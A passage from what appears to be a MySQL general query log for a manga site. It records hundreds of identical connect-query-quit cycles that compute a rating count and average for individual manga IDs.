created desc 330638523 Quit 330638524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330638524 Quit 330638525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330638525 Quit 330638526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330638526 Quit 330638527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330638527 Quit 330638528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330638528 Quit 330638529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330638529 Quit 330638530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330638530 Quit 330638531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330638531 Quit 330638532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330638532 Quit 330638533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330638533 Quit 330638534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330638534 Quit 330638535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330638535 Quit 330638536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330638536 Quit 330638537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330638537 Quit 330638538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330638538 Quit 330638539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330638539 Quit 330638540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330638540 Quit 330638541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330638541 Quit 330638542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330638542 Quit 330638543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330638543 Quit 330638544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330638544 Quit 330638545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330638545 Quit 330638546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330638546 Quit 330638547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330638547 Quit 330638548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330638548 Quit 330638549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330638549 Quit 330638550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330638550 Quit 330638551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330638551 Quit 330638552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330638552 Quit 330638553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330638553 Quit 330638554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330638554 Quit 330638555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330638555 Quit 330638556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '101' order by created desc 330638556 Quit 330638557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330638557 Quit 330638558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330638558 Quit 330638559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '17' order by created desc 330638559 Quit 330638560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '68' order by created desc 330638560 Quit 330638561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '78' order by created desc 330638561 Quit 330638562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330638562 Quit 330638563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '41' order by created desc 330638563 Quit 330638564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '75' order by created desc 330638564 Quit 330638565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '177' order by created desc 330638565 Quit 330638566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330638566 Quit 330638567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '87' order by created desc 330638567 Quit 330638568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330638568 Quit 330638569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '112' order by created desc 330638569 Quit 330638570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330638570 Quit 330638571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330638571 Quit 330638572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '248' order by created desc 330638572 Quit 330638573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330638573 Quit 330638574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '77' order by created desc 330638574 Quit 330638575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330638575 Quit 330638576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '39' order by created desc 330638576 Quit 330638577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330638577 Quit 330638578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330638578 Quit 330638579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '94' order by created desc 330638579 Quit 330638580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330638580 Quit 330638581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330638581 Quit 330638582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '105' order by created desc 330638582 Quit 330638583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330638583 Quit 330638584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '204' order by created desc 330638584 Quit 330638585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330638585 Quit 330638586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '70' order by created desc 330638586 Quit 330638587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '259' order by created desc 330638587 Quit 330638588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330638588 Quit 330638589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330638589 Quit 330638590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '82' order by created desc 330638590 Quit 330638591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '202' order by created desc 330638591 Quit 330638592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '6' order by created desc 330638592 Quit 330638593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '67' order by created desc 330638593 Quit 330638594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '267' order by created desc 330638594 Quit 330638595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330638595 Quit 330638596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '180' order by created desc 330638596 Quit 330638597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638597 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330638597 Quit 330638598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638598 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '129' order by created desc 330638598 Quit 330638599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638599 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330638599 Quit 330638600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638600 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330638600 Quit 330638601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638601 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '199' order by created desc 330638601 Quit 330638602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638602 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330638602 Quit 330638603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638603 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330638603 Quit 330638604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638604 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '73' order by created desc 330638604 Quit 330638605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638605 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330638605 Quit 330638606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330638606 Quit 330638607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330638607 Quit 330638608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330638608 Quit 330638609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330638609 Quit 330638610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330638610 Quit 330638611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330638611 Quit 330638612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330638612 Quit 330638613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330638613 Quit 330638614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330638614 Quit 330638615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330638615 Quit 330638616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330638616 Quit 330638617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330638617 Quit 330638618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330638618 Quit 330638619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330638619 Quit 330638620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330638620 Quit 330638621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330638621 Quit 330638622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330638622 Quit 330638623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330638623 Quit 330638624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330638624 Quit 330638625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330638625 Quit 330638626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330638626 Quit 330638627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330638627 Quit 330638628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330638628 Quit 330638629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330638629 Quit 330638630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330638630 Quit 330638631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330638631 Quit 330638632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330638632 Quit 330638633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330638633 Quit 330638634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330638634 Quit 330638635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330638635 Quit 330638636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330638636 Quit 330638637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330638637 Quit 330638638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330638638 Quit 330638639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330638639 Quit 330638640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330638640 Quit 330638641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330638641 Quit 330638642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330638642 Quit 330638643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330638643 Quit 330638644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330638644 Quit 330638645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330638645 Quit 330638646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330638646 Quit 330638647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330638647 Quit 330638648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330638648 Quit 330638649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330638649 Quit 330638650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330638650 Quit 330638651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330638651 Quit 330638652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330638652 Quit 330638653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330638653 Quit 330638654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330638654 Quit 330638655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330638655 Quit 330638656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330638656 Quit 330638657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330638657 Quit 330638658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330638658 Quit 330638659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330638659 Quit 330638660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330638660 Quit 330638661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330638661 Quit 330638662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330638662 Quit 330638663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330638663 Quit 330638664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330638664 Quit 330638665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330638665 Quit 330638666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330638666 Quit 330638667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330638667 Quit 330638668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330638668 Quit 330638669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330638669 Quit 330638670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330638670 Quit 330638671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330638671 Quit 330638672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330638672 Quit 330638673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330638673 Quit 330638674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330638674 Quit 330638675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330638675 Quit 330638676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 